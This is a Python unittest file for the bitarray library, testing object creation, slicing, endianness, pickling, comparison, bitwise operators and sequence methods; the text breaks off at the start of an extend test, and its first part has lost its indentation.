@staticmethod
def rndsliceidx(length):
if randint(0, 1):
return None
else:
return randint(-length-5, length+5)
@staticmethod
def slicelen(s, length):
assert isinstance(s, slice)
start, stop, step = s.indices(length)
slicelength = (stop - start + (1 if step < 0 else -1)) // step + 1
if slicelength < 0:
slicelength = 0
return slicelength
def check_obj(self, a):
self.assertEqual(repr(type(a)), "<class 'bitarray.bitarray'>")
unused = 8 * a.buffer_info()[1] - len(a)
self.assertTrue(0 <= unused < 8)
self.assertEqual(unused, a.buffer_info()[3])
def assertEQUAL(self, a, b):
self.assertEqual(a, b)
self.assertEqual(a.endian(), b.endian())
self.check_obj(a)
self.check_obj(b)
def assertStopIteration(self, it):
if is_py3k:
return
self.assertRaises(StopIteration, it.next)
if sys.version_info[:2] == (2, 6):
def assertIsInstance(self, o, t):
self.assertTrue(isinstance(o, t))
# ---------------------------------------------------------------------------
class TestsModuleFunctions(unittest.TestCase, Util):
def test_bitdiff(self):
a = bitarray('0011')
b = bitarray('0101')
self.assertEqual(bitdiff(a, b), 2)
self.assertRaises(TypeError, bitdiff, a, '')
self.assertRaises(TypeError, bitdiff, '1', b)
self.assertRaises(TypeError, bitdiff, a, 4)
b.append(1)
self.assertRaises(ValueError, bitdiff, a, b)
for n in list(range(50)) + [randint(1000, 2000)]:
a = bitarray()
a.frombytes(os.urandom(bits2bytes(n)))
del a[n:]
b = bitarray()
b.frombytes(os.urandom(bits2bytes(n)))
del b[n:]
diff = sum(a[i] ^ b[i] for i in range(n))
self.assertEqual(bitdiff(a, b), diff)
def test_bits2bytes(self):
for arg in ['foo', [], None, {}]:
self.assertRaises(TypeError, bits2bytes, arg)
self.assertRaises(TypeError, bits2bytes, 187.0)
self.assertRaises(TypeError, bits2bytes, -4.0)
self.assertRaises(TypeError, bits2bytes)
self.assertRaises(TypeError, bits2bytes, 1, 2)
self.assertRaises(ValueError, bits2bytes, -1)
self.assertRaises(ValueError, bits2bytes, -924)
self.assertEqual(bits2bytes(0), 0)
for n in range(1, 100):
self.assertEqual(bits2bytes(n), (n - 1) // 8 + 1)
for n, m in [(0, 0), (1, 1), (2, 1), (7, 1), (8, 1), (9, 2),
(10, 2), (15, 2), (16, 2), (64, 8), (65, 9),
(2**31, 2**28), (2**32, 2**29), (2**34, 2**31),
(2**34+793, 2**31+100), (2**35-8, 2**32-1),
(2**62, 2**59), (2**63-8, 2**60-1)]:
self.assertEqual(bits2bytes(n), m)
tests.append(TestsModuleFunctions)
# ---------------------------------------------------------------------------
class CreateObjectTests(unittest.TestCase, Util):
def test_noInitializer(self):
a = bitarray()
self.assertEqual(len(a), 0)
self.assertEqual(a.tolist(), [])
self.check_obj(a)
def test_endian1(self):
a = bitarray(endian='little')
a.fromstring('A')
self.assertEqual(a.endian(), 'little')
self.assertIsInstance(a.endian(), str)
self.check_obj(a)
b = bitarray(endian='big')
b.fromstring('A')
self.assertEqual(b.endian(), 'big')
self.assertIsInstance(a.endian(), str)
self.check_obj(b)
self.assertEqual(a.tostring(), b.tostring())
def test_endian2(self):
a = bitarray(endian='little')
a.fromstring(' ')
self.assertEqual(a.endian(), 'little')
self.check_obj(a)
b = bitarray(endian='big')
b.fromstring(' ')
self.assertEqual(b.endian(), 'big')
self.check_obj(b)
self.assertEqual(a.tostring(), b.tostring())
self.assertRaises(TypeError, bitarray.__new__, bitarray, endian=0)
self.assertRaises(ValueError, bitarray.__new__, bitarray, endian='')
self.assertRaises(ValueError, bitarray.__new__,
bitarray, endian='foo')
def test_integers(self):
for n in range(50):
a = bitarray(n)
self.assertEqual(len(a), n)
self.check_obj(a)
a = bitarray(int(n))
self.assertEqual(len(a), n)
self.check_obj(a)
self.assertRaises(ValueError, bitarray.__new__, bitarray, -1)
self.assertRaises(ValueError, bitarray.__new__, bitarray, -924)
def test_list(self):
lst = ['foo', None, [1], {}]
a = bitarray(lst)
self.assertEqual(a.tolist(), [True, False, True, False])
self.check_obj(a)
for n in range(50):
lst = [bool(randint(0, 1)) for d in range(n)]
a = bitarray(lst)
self.assertEqual(a.tolist(), lst)
self.check_obj(a)
def test_tuple(self):
tup = ('', True, [], {1:2})
a = bitarray(tup)
self.assertEqual(a.tolist(), [False, True, False, True])
self.check_obj(a)
for n in range(50):
lst = [bool(randint(0, 1)) for d in range(n)]
a = bitarray(tuple(lst))
self.assertEqual(a.tolist(), lst)
self.check_obj(a)
def test_iter1(self):
for n in range(50):
lst = [bool(randint(0, 1)) for d in range(n)]
a = bitarray(iter(lst))
self.assertEqual(a.tolist(), lst)
self.check_obj(a)
def test_iter2(self):
for lst in self.randomlists():
def foo():
for x in lst:
yield x
a = bitarray(foo())
self.assertEqual(a, bitarray(lst))
self.check_obj(a)
def test_iter3(self):
a = bitarray(itertools.repeat(False, 10))
self.assertEqual(a, bitarray(10 * '0'))
# Note that the through value of '0' is True: bool('0') -> True
a = bitarray(itertools.repeat('0', 10))
self.assertEqual(a, bitarray(10 * '1'))
def test_01(self):
a = bitarray('0010111')
self.assertEqual(a.tolist(), [0, 0, 1, 0, 1, 1, 1])
self.check_obj(a)
for n in range(50):
lst = [bool(randint(0, 1)) for d in range(n)]
s = ''.join([['0', '1'][x] for x in lst])
a = bitarray(s)
self.assertEqual(a.tolist(), lst)
self.check_obj(a)
self.assertRaises(ValueError, bitarray.__new__, bitarray, '01012100')
def test_rawbytes(self): # this representation is used for pickling
for s, r in [(b'\x00', ''), (b'\x07\xff', '1'), (b'\x03\xff', '11111'),
(b'\x01\x87\xda', '10000111' '1101101')]:
self.assertEqual(bitarray(s, endian='big'),
bitarray(r))
for i in range(1, 8):
self.assertRaises(ValueError, bitarray.__new__,
bitarray, bytes(bytearray([i])))
def test_bitarray(self):
for n in range(10):
a = bitarray(n)
b = bitarray(a)
self.assertFalse(a is b)
self.assertEQUAL(a, b)
for end in ('little', 'big'):
a = bitarray(endian=end)
c = bitarray(a)
self.assertEqual(c.endian(), end)
c = bitarray(a, endian='little')
self.assertEqual(c.endian(), 'little')
c = bitarray(a, endian='big')
self.assertEqual(c.endian(), 'big')
def test_None(self):
self.assertEQUAL(bitarray(), bitarray(0))
self.assertEQUAL(bitarray(), bitarray(None))
def test_WrongArgs(self):
self.assertRaises(TypeError, bitarray.__new__, bitarray, 'A', 42, 69)
self.assertRaises(TypeError, bitarray.__new__, bitarray, Ellipsis)
self.assertRaises(TypeError, bitarray.__new__, bitarray, slice(0))
self.assertRaises(TypeError, bitarray.__new__, bitarray, 2.345)
self.assertRaises(TypeError, bitarray.__new__, bitarray, 4+3j)
self.assertRaises(TypeError, bitarray.__new__, bitarray, '', 0, 42)
self.assertRaises(ValueError, bitarray.__new__, bitarray, 0, 'foo')
tests.append(CreateObjectTests)
# ---------------------------------------------------------------------------
class ToObjectsTests(unittest.TestCase, Util):
def test_numeric(self):
a = bitarray()
self.assertRaises(Exception, int, a)
self.assertRaises(Exception, float, a)
self.assertRaises(Exception, complex, a)
def test_list(self):
for a in self.randombitarrays():
self.assertEqual(list(a), a.tolist())
def test_tuple(self):
for a in self.randombitarrays():
self.assertEqual(tuple(a), tuple(a.tolist()))
tests.append(ToObjectsTests)
# ---------------------------------------------------------------------------
class MetaDataTests(unittest.TestCase, Util):
def test_buffer_info1(self):
a = bitarray('0000111100001', endian='little')
self.assertEqual(a.buffer_info()[1:4], (2, 'little', 3))
a = bitarray()
self.assertRaises(TypeError, a.buffer_info, 42)
bi = a.buffer_info()
self.assertIsInstance(bi, tuple)
self.assertEqual(len(bi), 5)
self.assertIsInstance(bi[0], int)
if is_py3k:
self.assertIsInstance(bi[1], int)
self.assertIsInstance(bi[2], str)
self.assertIsInstance(bi[3], int)
if is_py3k:
self.assertIsInstance(bi[4], int)
def test_buffer_info2(self):
for n in range(50):
bi = bitarray(n).buffer_info()
self.assertEqual(bi[1], bits2bytes(n))
self.assertEqual(bi[3] + n, 8 * bi[1])
self.assertTrue(bi[4] >= bi[1])
def test_buffer_info3(self):
a = bitarray(endian='little')
self.assertEqual(a.buffer_info()[2], 'little')
a = bitarray(endian='big')
self.assertEqual(a.buffer_info()[2], 'big')
def test_endian(self):
a = bitarray(endian='little')
self.assertEqual(a.endian(), 'little')
a = bitarray(endian='big')
self.assertEqual(a.endian(), 'big')
def test_length(self):
for n in range(100):
a = bitarray(n)
self.assertEqual(len(a), n)
self.assertEqual(a.length(), n)
tests.append(MetaDataTests)
# ---------------------------------------------------------------------------
class SliceTests(unittest.TestCase, Util):
def test_getitem1(self):
a = bitarray()
self.assertRaises(IndexError, a.__getitem__, 0)
a.append(True)
self.assertEqual(a[0], True)
self.assertRaises(IndexError, a.__getitem__, 1)
self.assertRaises(IndexError, a.__getitem__, -2)
a.append(False)
self.assertEqual(a[1], False)
self.assertRaises(IndexError, a.__getitem__, 2)
self.assertRaises(IndexError, a.__getitem__, -3)
def test_getitem2(self):
a = bitarray('1100010')
for i, b in enumerate([True, True, False, False, False, True, False]):
self.assertEqual(a[i], b)
self.assertEqual(a[i-7], b)
self.assertRaises(IndexError, a.__getitem__, 7)
self.assertRaises(IndexError, a.__getitem__, -8)
def test_getitem3(self):
a = bitarray('0100000100001')
self.assertEQUAL(a[:], a)
self.assertFalse(a[:] is a)
aa = a.tolist()
self.assertEQUAL(a[11:2:-3], bitarray(aa[11:2:-3]))
self.check_obj(a[:])
self.assertRaises(ValueError, a.__getitem__, slice(None, None, 0))
self.assertRaises(TypeError, a.__getitem__, (1, 2))
def test_getitem4(self):
for a in self.randombitarrays(start=1):
aa = a.tolist()
la = len(a)
for dum in range(10):
step = self.rndsliceidx(la) or None
s = slice(self.rndsliceidx(la), self.rndsliceidx(la), step)
self.assertEQUAL(a[s], bitarray(aa[s], endian=a.endian()))
def test_setitem1(self):
a = bitarray([False])
a[0] = 1
self.assertEqual(a, bitarray('1'))
a = bitarray(2)
a[0] = 0
a[1] = 1
self.assertEqual(a, bitarray('01'))
a[-1] = 0
a[-2] = 1
self.assertEqual(a, bitarray('10'))
self.assertRaises(IndexError, a.__setitem__, 2, True)
self.assertRaises(IndexError, a.__setitem__, -3, False)
def test_setitem2(self):
for a in self.randombitarrays(start=1):
la = len(a)
i = randint(0, la - 1)
aa = a.tolist()
ida = id(a)
val = bool(randint(0, 1))
a[i] = val
aa[i] = val
self.assertEqual(a.tolist(), aa)
self.assertEqual(id(a), ida)
self.check_obj(a)
b = bitarray(la)
b[0:la] = bitarray(a)
self.assertEqual(a, b)
self.assertNotEqual(id(a), id(b))
b = bitarray(la)
b[:] = bitarray(a)
self.assertEqual(a, b)
self.assertNotEqual(id(a), id(b))
b = bitarray(la)
b[::-1] = bitarray(a)
self.assertEqual(a.tolist()[::-1], b.tolist())
def test_setitem3(self):
a = bitarray('00000')
a[0] = 1
a[-2] = 1
self.assertEqual(a, bitarray('10010'))
self.assertRaises(IndexError, a.__setitem__, 5, 'foo')
self.assertRaises(IndexError, a.__setitem__, -6, 'bar')
def test_setitem4(self):
for a in self.randombitarrays(start=1):
la = len(a)
for dum in range(10):
step = self.rndsliceidx(la) or None
s = slice(self.rndsliceidx(la), self.rndsliceidx(la), step)
lb = randint(0, 10) if step is None else self.slicelen(s, la)
b = bitarray(lb)
c = bitarray(a)
c[s] = b
self.check_obj(c)
cc = a.tolist()
cc[s] = b.tolist()
self.assertEqual(c, bitarray(cc))
def test_setslice_to_bitarray(self):
a = bitarray('11111111' '1111')
a[2:6] = bitarray('0010')
self.assertEqual(a, bitarray('11001011' '1111'))
a.setall(0)
a[::2] = bitarray('111001')
self.assertEqual(a, bitarray('10101000' '0010'))
a.setall(0)
a[3:] = bitarray('111')
self.assertEqual(a, bitarray('000111'))
a = bitarray(12)
a.setall(0)
a[1:11:2] = bitarray('11101')
self.assertEqual(a, bitarray('01010100' '0100'))
a = bitarray(12)
a.setall(0)
a[:-6:-1] = bitarray('10111')
self.assertEqual(a, bitarray('00000001' '1101'))
a = bitarray('1111')
a[3:3] = bitarray('000') # insert
self.assertEqual(a, bitarray('1110001'))
a[2:5] = bitarray() # remove
self.assertEqual(a, bitarray('1101'))
a = bitarray('1111')
a[1:3] = bitarray('0000')
self.assertEqual(a, bitarray('100001'))
a[:] = bitarray('010') # replace all values
self.assertEqual(a, bitarray('010'))
def test_setslice_to_bool(self):
a = bitarray('11111111')
a[::2] = False
self.assertEqual(a, bitarray('01010101'))
a[4::] = True # ^^^^
self.assertEqual(a, bitarray('01011111'))
a[-2:] = False # ^^
self.assertEqual(a, bitarray('01011100'))
a[:2:] = True # ^^
self.assertEqual(a, bitarray('11011100'))
a[:] = True # ^^^^^^^^
self.assertEqual(a, bitarray('11111111'))
a[2:5] = False # ^^^
self.assertEqual(a, bitarray('11000111'))
a[1::3] = False # ^ ^ ^
self.assertEqual(a, bitarray('10000110'))
a[1:6:2] = True # ^ ^ ^
self.assertEqual(a, bitarray('11010110'))
def test_setslice_to_int(self):
a = bitarray('11111111')
a[::2] = 0 # ^ ^ ^ ^
self.assertEqual(a, bitarray('01010101'))
a[4::] = 1 # ^^^^
self.assertEqual(a, bitarray('01011111'))
a.__setitem__(slice(-2, None, None), 0)
self.assertEqual(a, bitarray('01011100'))
self.assertRaises(ValueError, a.__setitem__, slice(None, None, 2), 3)
self.assertRaises(ValueError, a.__setitem__, slice(None, 2, None), -1)
def test_sieve(self): # Sieve of Eratosthenes
a = bitarray(50)
a.setall(1)
for i in range(2, 8):
if a[i]:
a[i*i::i] = 0
primes = [i for i in range(2, 50) if a[i]]
self.assertEqual(primes, [2, 3, 5, 7, 11, 13, 17, 19,
23, 29, 31, 37, 41, 43, 47])
def test_delitem1(self):
a = bitarray('100110')
del a[1]
self.assertEqual(len(a), 5)
del a[3]
del a[-2]
self.assertEqual(a, bitarray('100'))
self.assertRaises(IndexError, a.__delitem__, 3)
self.assertRaises(IndexError, a.__delitem__, -4)
a = bitarray('10101100' '10110')
del a[3:9] # ^^^^^ ^
self.assertEqual(a, bitarray('1010110'))
del a[::3] # ^ ^ ^
self.assertEqual(a, bitarray('0111'))
a = bitarray('10101100' '1011011')
del a[:-9:-2] # ^ ^ ^ ^
self.assertEqual(a, bitarray('10101100' '011'))
    def test_delitem2(self):
        """Deleting a random slice agrees with deleting the same slice
        from the equivalent Python list, and happens in place."""
        for a in self.randombitarrays(start=1):
            la = len(a)
            for dum in range(10):
                step = self.rndsliceidx(la) or None  # step must not be 0
                s = slice(self.rndsliceidx(la), self.rndsliceidx(la), step)
                c = bitarray(a)
                d = c
                del c[s]
                self.assertTrue(c is d)  # deletion works in place
                self.check_obj(c)
                cc = a.tolist()
                del cc[s]
                self.assertEQUAL(c, bitarray(cc, endian=c.endian()))
tests.append(SliceTests)
# ---------------------------------------------------------------------------
class MiscTests(unittest.TestCase, Util):
    """Assorted behavior: instance checks, truthiness, to01(), iteration,
    rich comparison, subclassing, endianness, pickling, overflow on
    32-bit builds, unicode input and unhashability."""

    def test_instancecheck(self):
        a = bitarray('011')
        self.assertIsInstance(a, bitarray)
        self.assertFalse(isinstance(a, str))

    def test_booleanness(self):
        # only the empty bitarray is falsy
        self.assertEqual(bool(bitarray('')), False)
        self.assertEqual(bool(bitarray('0')), True)
        self.assertEqual(bool(bitarray('1')), True)

    def test_to01(self):
        """to01() returns the bits as a str of '0'/'1' characters."""
        a = bitarray()
        self.assertEqual(a.to01(), '')
        self.assertIsInstance(a.to01(), str)
        a = bitarray('101')
        self.assertEqual(a.to01(), '101')
        self.assertIsInstance(a.to01(), str)

    def test_iterate(self):
        for lst in self.randomlists():
            acc = []
            for b in bitarray(lst):
                acc.append(b)
            self.assertEqual(acc, lst)

    def test_iter1(self):
        # iteration yields bools
        it = iter(bitarray('011'))
        self.assertEqual(next(it), False)
        self.assertEqual(next(it), True)
        self.assertEqual(next(it), True)
        self.assertStopIteration(it)

    def test_iter2(self):
        for a in self.randombitarrays():
            aa = a.tolist()
            self.assertEqual(list(a), aa)
            self.assertEqual(list(iter(a)), aa)

    def test_assignment(self):
        # slices of a bitarray may be assigned to other slices of itself
        a = bitarray('00110111001')
        a[1:3] = a[7:9]
        a[-1:] = a[:1]
        b = bitarray('01010111000')
        self.assertEqual(a, b)

    def test_compare(self):
        # all six comparison operators agree with comparing the
        # equivalent Python lists
        for a in self.randombitarrays():
            aa = a.tolist()
            for b in self.randombitarrays():
                bb = b.tolist()
                self.assertEqual(a == b, aa == bb)
                self.assertEqual(a != b, aa != bb)
                self.assertEqual(a <= b, aa <= bb)
                self.assertEqual(a < b, aa < bb)
                self.assertEqual(a >= b, aa >= bb)
                self.assertEqual(a > b, aa > bb)

    def test_subclassing(self):
        """bitarray can be subclassed, and __new__/__getitem__ overridden."""
        class ExaggeratingBitarray(bitarray):

            def __new__(cls, data, offset):
                return bitarray.__new__(cls, data)

            def __init__(self, data, offset):
                self.offset = offset

            def __getitem__(self, i):
                return bitarray.__getitem__(self, i - self.offset)

        for a in self.randombitarrays(start=1):
            b = ExaggeratingBitarray(a, 1234)
            for i in range(len(a)):
                self.assertEqual(a[i], b[i+1234])

    def test_endianness1(self):
        # the same byte yields mirrored bit strings under opposite endianness
        a = bitarray(endian='little')
        a.frombytes(b'\x01')
        self.assertEqual(a.to01(), '10000000')
        b = bitarray(endian='little')
        b.frombytes(b'\x80')
        self.assertEqual(b.to01(), '00000001')
        c = bitarray(endian='big')
        c.frombytes(b'\x80')
        self.assertEqual(c.to01(), '10000000')
        d = bitarray(endian='big')
        d.frombytes(b'\x01')
        self.assertEqual(d.to01(), '00000001')
        self.assertEqual(a, c)
        self.assertEqual(b, d)

    def test_endianness2(self):
        # little-endian: bit 0 is the least significant bit of the byte
        a = bitarray(8, endian='little')
        a.setall(False)
        a[0] = True
        self.assertEqual(a.tobytes(), b'\x01')
        a[1] = True
        self.assertEqual(a.tobytes(), b'\x03')
        a.frombytes(b' ')
        self.assertEqual(a.tobytes(), b'\x03 ')
        self.assertEqual(a.to01(), '1100000000000100')

    def test_endianness3(self):
        # big-endian: bit 7 is the least significant bit of the byte
        a = bitarray(8, endian='big')
        a.setall(False)
        a[7] = True
        self.assertEqual(a.tobytes(), b'\x01')
        a[6] = True
        self.assertEqual(a.tobytes(), b'\x03')
        a.frombytes(b' ')
        self.assertEqual(a.tobytes(), b'\x03 ')
        self.assertEqual(a.to01(), '0000001100100000')

    def test_endianness4(self):
        # different bit strings can map to the same byte value
        a = bitarray('00100000', endian='big')
        self.assertEqual(a.tobytes(), b' ')
        b = bitarray('00000100', endian='little')
        self.assertEqual(b.tobytes(), b' ')
        self.assertNotEqual(a, b)

    def test_endianness5(self):
        # equality is defined on bit values, not on the underlying bytes
        a = bitarray('11100000', endian='little')
        b = bitarray(a, endian='big')
        self.assertNotEqual(a, b)
        self.assertEqual(a.tobytes(), b.tobytes())

    def test_pickle(self):
        for v in range(3):  # pickle protocols 0, 1 and 2
            for a in self.randombitarrays():
                b = pickle.loads(pickle.dumps(a, v))
                self.assertFalse(b is a)
                self.assertEQUAL(a, b)

    def test_overflow(self):
        # only relevant on 32-bit builds; _sysinfo()[0] is presumably the
        # platform word size in bytes -- TODO confirm against _sysinfo
        if _sysinfo()[0] == 8:
            return
        self.assertRaises(OverflowError, bitarray.__new__,
                          bitarray, 2**34 + 1)
        a = bitarray(10 ** 6)
        self.assertRaises(OverflowError, a.__imul__, 17180)

    def test_unicode1(self):
        # 'unicode' is presumably the py2/py3 compatibility alias defined
        # earlier in this file (str on Python 3) -- verify at file top
        a = bitarray(unicode())
        self.assertEqual(a, bitarray())
        a = bitarray(unicode('111001'))
        self.assertEqual(a, bitarray('111001'))
        for a in self.randombitarrays():
            b = bitarray(unicode(a.to01()))
            self.assertEqual(a, b)

    def test_unicode2(self):
        a = bitarray()
        a.extend(unicode())
        self.assertEqual(a, bitarray())
        a = bitarray()
        a.extend(unicode('001011'))
        self.assertEqual(a, bitarray('001011'))
        for a in self.randombitarrays():
            b = bitarray()
            b.extend(unicode(a.to01()))
            self.assertEqual(a, b)

    def test_unhashable(self):
        # bitarrays are mutable, hence unhashable
        a = bitarray()
        self.assertRaises(TypeError, hash, a)
        self.assertRaises(TypeError, dict, [(a, 'foo')])

tests.append(MiscTests)
# ---------------------------------------------------------------------------
class SpecialMethodTests(unittest.TestCase, Util):
    """Tests for all()/any(), repr(), copying and symmetric equality."""

    def test_all(self):
        a = bitarray()
        self.assertTrue(a.all())  # vacuously true for the empty bitarray
        for s, r in ('0', False), ('1', True), ('01', False):
            self.assertEqual(bitarray(s).all(), r)
        for a in self.randombitarrays():
            # agrees with the built-in all()
            self.assertEqual(all(a), a.all())
            self.assertEqual(all(a.tolist()), a.all())

    def test_any(self):
        a = bitarray()
        self.assertFalse(a.any())  # vacuously false for the empty bitarray
        for s, r in ('0', False), ('1', True), ('01', True):
            self.assertEqual(bitarray(s).any(), r)
        for a in self.randombitarrays():
            # agrees with the built-in any()
            self.assertEqual(any(a), a.any())
            self.assertEqual(any(a.tolist()), a.any())

    def test_repr(self):
        r = repr(bitarray())
        self.assertEqual(r, "bitarray()")
        self.assertIsInstance(r, str)
        r = repr(bitarray('10111'))
        self.assertEqual(r, "bitarray('10111')")
        self.assertIsInstance(r, str)
        for a in self.randombitarrays():
            b = eval(repr(a))  # repr must round-trip through eval
            self.assertFalse(b is a)
            self.assertEqual(a, b)
            self.check_obj(b)

    def test_copy(self):
        # .copy(), copy.copy() and copy.deepcopy() all yield equal,
        # distinct objects
        for a in self.randombitarrays():
            b = a.copy()
            self.assertFalse(b is a)
            self.assertEQUAL(a, b)
            b = copy.copy(a)
            self.assertFalse(b is a)
            self.assertEQUAL(a, b)
            b = copy.deepcopy(a)
            self.assertFalse(b is a)
            self.assertEQUAL(a, b)

    def assertReallyEqual(self, a, b):
        """Assert equality symmetrically, via ==, != and (py2) cmp()."""
        # assertEqual first, because it will have a good message if the
        # assertion fails.
        self.assertEqual(a, b)
        self.assertEqual(b, a)
        self.assertTrue(a == b)
        self.assertTrue(b == a)
        self.assertFalse(a != b)
        self.assertFalse(b != a)
        if not is_py3k:
            # Python 2 only: cmp() must agree as well
            self.assertEqual(0, cmp(a, b))
            self.assertEqual(0, cmp(b, a))

    def assertReallyNotEqual(self, a, b):
        """Assert inequality symmetrically, via ==, != and (py2) cmp()."""
        # assertNotEqual first, because it will have a good message if the
        # assertion fails.
        self.assertNotEqual(a, b)
        self.assertNotEqual(b, a)
        self.assertFalse(a == b)
        self.assertFalse(b == a)
        self.assertTrue(a != b)
        self.assertTrue(b != a)
        if not is_py3k:
            self.assertNotEqual(0, cmp(a, b))
            self.assertNotEqual(0, cmp(b, a))

    def test_equality(self):
        self.assertReallyEqual(bitarray(''), bitarray(''))
        self.assertReallyEqual(bitarray('0'), bitarray('0'))
        self.assertReallyEqual(bitarray('1'), bitarray('1'))

    def test_not_equality(self):
        self.assertReallyNotEqual(bitarray(''), bitarray('1'))
        self.assertReallyNotEqual(bitarray(''), bitarray('0'))
        self.assertReallyNotEqual(bitarray('0'), bitarray('1'))

tests.append(SpecialMethodTests)
# ---------------------------------------------------------------------------
class NumberTests(unittest.TestCase, Util):
    """Concatenation (+, +=) and repetition (*, *=) operators."""

    def test_add(self):
        c = bitarray('001') + bitarray('110')
        self.assertEQUAL(c, bitarray('001110'))
        for a in self.randombitarrays():
            aa = a.copy()
            for b in self.randombitarrays():
                bb = b.copy()
                c = a + b
                self.assertEqual(c, bitarray(a.tolist() + b.tolist()))
                # the result takes the left operand's endianness
                self.assertEqual(c.endian(), a.endian())
                self.check_obj(c)
                # the operands themselves are left untouched
                self.assertEQUAL(a, aa)
                self.assertEQUAL(b, bb)
        a = bitarray()
        self.assertRaises(TypeError, a.__add__, 42)

    def test_iadd(self):
        c = bitarray('001')
        c += bitarray('110')
        self.assertEQUAL(c, bitarray('001110'))
        for a in self.randombitarrays():
            for b in self.randombitarrays():
                c = bitarray(a)
                d = c
                d += b
                self.assertEqual(d, a + b)
                self.assertTrue(c is d)  # += operates in place
                self.assertEQUAL(c, d)
                self.assertEqual(d.endian(), a.endian())
                self.check_obj(d)
        a = bitarray()
        self.assertRaises(TypeError, a.__iadd__, 42)

    def test_mul(self):
        c = 0 * bitarray('1001111')
        self.assertEQUAL(c, bitarray())
        c = 3 * bitarray('001')
        self.assertEQUAL(c, bitarray('001001001'))
        c = bitarray('110') * 3
        self.assertEQUAL(c, bitarray('110110110'))
        for a in self.randombitarrays():
            b = a.copy()
            # negative factors yield an empty result, like list * n
            for n in range(-10, 20):
                c = a * n
                self.assertEQUAL(c, bitarray(n * a.tolist(),
                                             endian=a.endian()))
                c = n * a
                self.assertEqual(c, bitarray(n * a.tolist(),
                                             endian=a.endian()))
                self.assertEQUAL(a, b)  # operand unchanged
        a = bitarray()
        self.assertRaises(TypeError, a.__mul__, None)

    def test_imul(self):
        c = bitarray('1101110011')
        idc = id(c)
        c *= 0
        self.assertEQUAL(c, bitarray())
        self.assertEqual(idc, id(c))  # *= operates in place
        c = bitarray('110')
        c *= 3
        self.assertEQUAL(c, bitarray('110110110'))
        for a in self.randombitarrays():
            for n in range(-10, 10):
                b = a.copy()
                idb = id(b)
                b *= n
                self.assertEQUAL(b, bitarray(n * a.tolist(),
                                             endian=a.endian()))
                self.assertEqual(idb, id(b))

        a = bitarray()
        self.assertRaises(TypeError, a.__imul__, None)

tests.append(NumberTests)
# ---------------------------------------------------------------------------
class BitwiseTests(unittest.TestCase, Util):
    """Bitwise operators &, |, ^, their in-place forms, and inversion."""

    def test_misc(self):
        for a in self.randombitarrays():
            b = ~a
            c = a & b
            self.assertEqual(c.any(), False)  # a & ~a is all zeros
            self.assertEqual(a, a ^ c)        # xor with zeros is identity
            d = a ^ b
            self.assertEqual(d.all(), True)   # a ^ ~a is all ones
            b &= d
            self.assertEqual(~b, a)

    def test_and(self):
        a = bitarray('11001')
        b = bitarray('10011')
        self.assertEQUAL(a & b, bitarray('10001'))
        b = bitarray('1001')
        self.assertRaises(ValueError, a.__and__, b) # not same length
        self.assertRaises(TypeError, a.__and__, 42)

    def test_iand(self):
        a = bitarray('110010110')
        ida = id(a)
        a &= bitarray('100110011')
        self.assertEQUAL(a, bitarray('100010010'))
        self.assertEqual(ida, id(a))  # &= operates in place

    def test_or(self):
        a = bitarray('11001')
        b = bitarray('10011')
        aa = a.copy()
        bb = b.copy()
        self.assertEQUAL(a | b, bitarray('11011'))
        # the operands are left unchanged
        self.assertEQUAL(a, aa)
        self.assertEQUAL(b, bb)

    def test_ior(self):
        a = bitarray('110010110')
        b = bitarray('100110011')
        bb = b.copy()
        a |= b
        self.assertEQUAL(a, bitarray('110110111'))
        self.assertEQUAL(b, bb)  # right operand unchanged

    def test_xor(self):
        a = bitarray('11001')
        b = bitarray('10011')
        self.assertEQUAL(a ^ b, bitarray('01010'))

    def test_ixor(self):
        a = bitarray('110010110')
        a ^= bitarray('100110011')
        self.assertEQUAL(a, bitarray('010100101'))

    def test_invert(self):
        a = bitarray()
        a.invert()
        self.assertEQUAL(a, bitarray())
        a = bitarray('11011')
        a.invert()  # .invert() flips in place
        self.assertEQUAL(a, bitarray('00100'))
        a = bitarray('11011')
        b = ~a      # ~ returns a new, inverted object
        self.assertEQUAL(b, bitarray('00100'))
        self.assertEQUAL(a, bitarray('11011'))
        self.assertFalse(a is b)
        for a in self.randombitarrays():
            b = bitarray(a)
            b.invert()
            for i in range(len(a)):
                self.assertEqual(b[i], not a[i])
            self.check_obj(b)
            c = ~a
            self.assertEQUAL(c, b)
            self.check_obj(c)

tests.append(BitwiseTests)
# ---------------------------------------------------------------------------
class SequenceTests(unittest.TestCase, Util):
    """The `in` operator, for single bit values and for sub-bitarrays."""

    def test_contains1(self):
        a = bitarray()
        self.assertFalse(False in a)
        self.assertFalse(True in a)
        self.assertTrue(bitarray() in a)  # empty sub-array is always found
        a.append(True)
        self.assertTrue(True in a)
        self.assertFalse(False in a)
        a = bitarray([False])
        self.assertTrue(False in a)
        self.assertFalse(True in a)
        a.append(True)
        self.assertTrue(0 in a)
        self.assertTrue(1 in a)
        if not is_py3k:
            # Python 2 long is accepted as a bit value as well
            self.assertTrue(long(0) in a)
            self.assertTrue(long(1) in a)

    def test_contains2(self):
        a = bitarray()
        self.assertEqual(a.__contains__(1), False)
        a.append(1)
        self.assertEqual(a.__contains__(1), True)
        a = bitarray('0011')
        self.assertEqual(a.__contains__(bitarray('01')), True)
        self.assertEqual(a.__contains__(bitarray('10')), False)
        self.assertRaises(TypeError, a.__contains__, 'asdf')
        # ints other than 0 and 1 are not valid bit values
        self.assertRaises(ValueError, a.__contains__, 2)
        self.assertRaises(ValueError, a.__contains__, -1)
        if not is_py3k:
            self.assertRaises(ValueError, a.__contains__, long(2))

    def test_contains3(self):
        for n in range(2, 50):
            a = bitarray(n)
            a.setall(0)
            self.assertTrue(False in a)
            self.assertFalse(True in a)
            a[randint(0, n - 1)] = 1
            self.assertTrue(True in a)
            self.assertTrue(False in a)
            a.setall(1)
            self.assertTrue(True in a)
            self.assertFalse(False in a)
            a[randint(0, n - 1)] = 0
            self.assertTrue(True in a)
            self.assertTrue(False in a)

    def test_contains4(self):
        # `in` with a bitarray operand does sub-sequence search
        a = bitarray('011010000001')
        for s, r in [('', True), ('1', True), ('11', True), ('111', False),
                     ('011', True), ('0001', True), ('00011', False)]:
            self.assertEqual(bitarray(s) in a, r)

tests.append(SequenceTests)
# ---------------------------------------------------------------------------
class ExtendTests(unittest.TestCase, Util):
    """extend() from bitarrays, lists, tuples, generators, iterators
    and 01-strings -- always in place."""

    def test_wrongArgs(self):
        a = bitarray()
        self.assertRaises(TypeError, a.extend)
        self.assertRaises(TypeError, a.extend, None)
        self.assertRaises(TypeError, a.extend, True)
        self.assertRaises(TypeError, a.extend, 24)
        # strings may only contain '0' and '1'
        self.assertRaises(ValueError, a.extend, '0011201')

    def test_bitarray(self):
